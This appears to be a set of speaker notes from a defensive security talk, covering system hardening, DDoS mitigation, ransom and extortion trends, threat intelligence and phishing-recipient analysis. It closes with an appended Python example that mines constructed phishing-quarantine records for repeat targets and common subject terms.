  15. Disable ports and services not needed. Eliminate PowerShell if not needed. Disable REPL or ISE if PowerShell is needed. Use VPS secure groups. https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/
  16. Visibility into new MD5s on the system, new services, scheduled jobs, registry key changes (PuTTY, terminal services, PsExec keys, etc.).
  17. Application whitelisting, or alternatively limit executables to run only from certain paths. Disable unneeded ports and services (HTTP, etc.). Defined roles on network shares with least privilege for user access. Privileged account management. If machines/shares are affected, is there a plan for continuity: to segment that machine and route traffic around it, or go to paper?
  18. Game plan for detecting DDoS before there are saturated links or system resource issues. Types of DDoS; discuss early detection from Lancope or other systems; having a plan for blocking, dropping, monitoring, scrubbing. In-network appliances can mitigate application layer attacks: geo-blocking (50% of DDoS originating IP space is in China), rate limiting, packet signatures. Partnership with Radware, Arbor, Cloudflare. Don’t rely on the ISP as the only play in your playbook.
  19. Baby monitors: DynDNS attack. CCTV cameras: Krebs attack.
  20. Lizard Squad also innovated with DDoS as a Service, where anyone with a bitcoin or two could lease their power to shut down any site they wanted. Recent arrests of 3 in Israel who had profited $600,000 renting out DDoS infrastructure.
  22. To avoid being one of the statistics in the $100,000 paid in BTC to Armada Collective imposters in 2016, or any amount to its peers, all a victim needed to do was look on Twitter or Google, both perfectly good sources of intel. A solid list of infosec leaders followed on Twitter can be a great early warning system.
  23. Following the money might not be for everyone, but law enforcement is now able to track Bitcoin transactions all the way to the wallets. These types of tools are also increasingly used by financial institutions that need to comply with KYC regulations if they want to take part in any blockchain transactions. It’s how we know that $209 million was paid out to ransomware in Q1 and Q2 2016. You can see whether others are paying to the wallet from your issue; if not, maybe it is targeted?
  24. Collage of threat intel vendors; discussion of CIM, STIX, TAXII and integration.
  25. Visualize your own logs from phishing campaigns, bucketing by work group, M&A activity, and the projects people are on. Collecting data on who the recipients of phishing emails are can begin to show you relationships, especially if you use a visualization tool such as i2 Analyst’s Notebook, Splunk, or, on the free side, an ELK stack. Are there common recipients between campaigns? Does this happen often? Are they in the same workgroup? Are they working on a deal with the same external customer? Could that customer have had a breach causing a leak of emails, or is that customer possibly doing their own recon? It has been known to happen. A word cloud will be weighted to show the most common terms as larger, and can be valuable for showing any common items that could be used for detection, or just to know trends. This can be valuable not only for real phishing, but for phishing training, to know what your employees are more susceptible to.
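The quarantine analysis sketched in note 25, as an added example that is not the deck's own tooling: it finds recipients shared between campaigns, counts hits per workgroup, flags campaigns confined to one workgroup, and weights subject terms for a word cloud. The records, field names and workgroups are constructed for the example; the assumed inputs are a normalised subject line per campaign and a directory lookup of each recipient's workgroup.

```python
"""Mining phishing-quarantine records: repeat recipients across campaigns,
workgroup exposure, single-workgroup campaigns, and term weights for a word
cloud. Records and field names are constructed for this example."""
from __future__ import annotations

import re
from collections import Counter, defaultdict

# Assumed record shape: one row per quarantined message, campaign = normalised
# subject line, workgroup = directory lookup of the recipient (all constructed).
QUARANTINE = [
    {"campaign": "Invoice overdue: action required", "recipient": "a.lee", "workgroup": "Finance"},
    {"campaign": "Invoice overdue: action required", "recipient": "b.ortiz", "workgroup": "Finance"},
    {"campaign": "Invoice overdue: action required", "recipient": "c.nguyen", "workgroup": "M&A"},
    {"campaign": "Wire transfer confirmation required", "recipient": "a.lee", "workgroup": "Finance"},
    {"campaign": "Wire transfer confirmation required", "recipient": "c.nguyen", "workgroup": "M&A"},
    {"campaign": "Wire transfer confirmation required", "recipient": "d.park", "workgroup": "Legal"},
    {"campaign": "Your mailbox is full: action required", "recipient": "e.shah", "workgroup": "HR"},
    {"campaign": "Your mailbox is full: action required", "recipient": "c.nguyen", "workgroup": "M&A"},
    {"campaign": "Project Falcon NDA draft", "recipient": "c.nguyen", "workgroup": "M&A"},
    {"campaign": "Project Falcon NDA draft", "recipient": "f.ross", "workgroup": "M&A"},
]

STOPWORDS = {"is", "your", "a", "the", "of"}


def campaigns_by_recipient(records) -> dict[str, set[str]]:
    hits: dict[str, set[str]] = defaultdict(set)
    for r in records:
        hits[r["recipient"]].add(r["campaign"])
    return dict(hits)


def repeat_targets(records, min_campaigns: int = 2) -> list[tuple[str, int]]:
    """Recipients hit by at least min_campaigns distinct campaigns, most-hit first."""
    counts = {who: len(c) for who, c in campaigns_by_recipient(records).items()}
    return sorted(((w, n) for w, n in counts.items() if n >= min_campaigns),
                  key=lambda x: (-x[1], x[0]))


def workgroup_exposure(records) -> Counter:
    """Distinct (campaign, recipient) hits per workgroup."""
    seen = {(r["workgroup"], r["campaign"], r["recipient"]) for r in records}
    return Counter(wg for wg, _, _ in seen)


def single_workgroup_campaigns(records) -> list[str]:
    """Campaigns whose recipients all sit in one workgroup: the 'same deal, same
    external customer' question, worth asking whether it is targeted or a leak."""
    groups: dict[str, set[str]] = defaultdict(set)
    for r in records:
        groups[r["campaign"]].add(r["workgroup"])
    return sorted(c for c, wgs in groups.items() if len(wgs) == 1)


def term_weights(records) -> Counter:
    """Word-cloud weights: number of distinct campaigns using each subject term."""
    weights: Counter = Counter()
    for subject in {r["campaign"] for r in records}:
        for term in set(re.findall(r"[a-z]+", subject.lower())) - STOPWORDS:
            weights[term] += 1
    return weights


if __name__ == "__main__":
    print("repeat targets:", repeat_targets(QUARANTINE))
    print("workgroup exposure:", workgroup_exposure(QUARANTINE).most_common())
    print("single-workgroup campaigns:", single_workgroup_campaigns(QUARANTINE))
    print("top terms:", term_weights(QUARANTINE).most_common(3))
```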